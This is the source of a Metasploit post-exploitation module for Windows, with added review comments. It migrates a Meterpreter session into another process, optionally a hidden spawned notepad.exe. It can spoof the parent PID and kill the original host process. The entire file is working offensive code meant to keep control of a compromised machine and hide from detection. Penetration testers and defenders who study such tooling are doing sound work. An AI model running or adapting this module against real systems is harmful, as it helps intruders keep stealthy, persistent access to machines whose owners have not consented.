##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that moves a Meterpreter session out of its current host
# process into another one: either an existing process (selected by PID or by
# image name) or a freshly spawned, hidden notepad.exe. Optionally kills the
# original host process afterwards.
class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::Windows::Process

  # Registers module metadata and the datastore options.
  #
  # Option precedence as implemented in #run: SPAWN is checked first, then PID,
  # then NAME. PPID / PPID_NAME are only consulted on the SPAWN path.
  #
  # @param info [Hash] module info passed through to Msf::Post#initialize
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Process Migration',
        'Description' => %q{
          This module will migrate a Meterpreter session from one process
          to another. A given process PID to migrate to or the module can spawn one and
          migrate to that newly spawned process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'phra <https://iwantmore.pizza>'
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            # Meterpreter commands this module issues; the session must support all of them.
            'Commands' => %w[
              core_migrate
              stdapi_sys_config_getenv
              stdapi_sys_process_attach
              stdapi_sys_process_execute
              stdapi_sys_process_kill
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        # Default is true, so a plain run spawns notepad.exe rather than using PID/NAME.
        OptBool.new('SPAWN', [false, 'Spawn process to migrate to. If set, notepad.exe is used.', true]),
        OptInt.new('PID', [false, 'PID of process to migrate to.', 0]),
        OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),
        OptString.new('PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),
        OptString.new('NAME', [false, 'Name of process to migrate to.']),
        OptBool.new('KILL', [false, 'Kill original process for the session.', false])
      ]
    )
  end

  # Module entry point: resolves the target pid, migrates, then optionally
  # kills the original server process.
  #
  # @return [void]
  def run
    # sysinfo may be nil on some sessions; fall back to running `hostname` on the target.
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    # Handle to the process currently hosting the session; only its pid and
    # name are used here (the pid is remembered for the KILL step below).
    server = session.sys.process.open
    original_pid = server.pid
    print_status("Current server process: #{server.name} (#{server.pid})")

    target_pid = nil

    # Target selection, first match wins: SPAWN, then PID, then NAME.
    # create_temp_proc returns nil when its PPID lookup fails, which is
    # caught by the `!target_pid` guard below (the error message then
    # interpolates an empty pid).
    if datastore['SPAWN'] && (datastore['SPAWN'] != '')
      target_pid = create_temp_proc
    elsif datastore['PID'] && (datastore['PID'] != 0)
      target_pid = datastore['PID']
    elsif datastore['NAME'] && (datastore['NAME'] != '')
      # Looks the process up by image name; presumably nil when no such process exists.
      target_pid = session.sys.process[datastore['NAME']]
    end

    if !target_pid || !has_pid?(target_pid)
      print_error("Process #{target_pid} not found")
      return
    end

    begin
      print_status("Migrating into #{target_pid}")
      session.core.migrate(target_pid)
      print_good("Successfully migrated into process #{target_pid}")
    rescue StandardError => e
      # Failure is reported but not re-raised; execution continues into the
      # KILL branch below regardless of whether the migration succeeded.
      print_error('Could not migrate into process')
      print_error("Exception: #{e.class} : #{e}")
    end

    if datastore['KILL']
      print_status("Killing original process with PID #{original_pid}")
      if has_pid?(original_pid)
        session.sys.process.kill(original_pid)
        print_good("Successfully killed process with PID #{original_pid}")
      else
        print_warning("PID #{original_pid} exited on its own")
      end
    end
  end

  # Spawns a hidden notepad.exe (path chosen by session architecture) to
  # migrate into and returns its pid. When PPID_NAME / PPID is set, that pid
  # is passed as the new process's parent.
  #
  # @return [Integer, nil] pid of the spawned process, or nil when the
  #   requested parent process does not exist
  def create_temp_proc
    # PPID_NAME lookup takes precedence; falls back to the numeric PPID option
    # (0 by default, meaning no parent spoofing).
    target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']
    # NOTE(review): client.arch is passed as both the first and the third
    # argument; confirm against the helper's signature in
    # Msf::Post::Windows::Process that this is intended.
    cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)

    print_status('Spawning notepad.exe process to migrate into')

    # A non-zero parent that cannot be found aborts the spawn (returns nil).
    if (target_ppid != 0) && !has_pid?(target_ppid)
      print_error("Process #{target_ppid} not found")
      return
    end

    # Presumably has_pid?(0) is false, so this only prints when a real parent was resolved.
    if has_pid?(target_ppid)
      print_status("Spoofing PPID #{target_ppid}")
    end

    # Run with no visible window. 'ParentPid' is always passed, including the
    # 0 "no spoofing" value; the execute call is assumed to treat 0 as unset.
    # From a detection standpoint the observable artifact of this path is a
    # hidden notepad.exe whose parent is target_ppid rather than the session host.
    proc = session.sys.process.execute(cmd, nil, {
      'Hidden' => true,
      'ParentPid' => target_ppid
    })

    return proc.pid
  end
end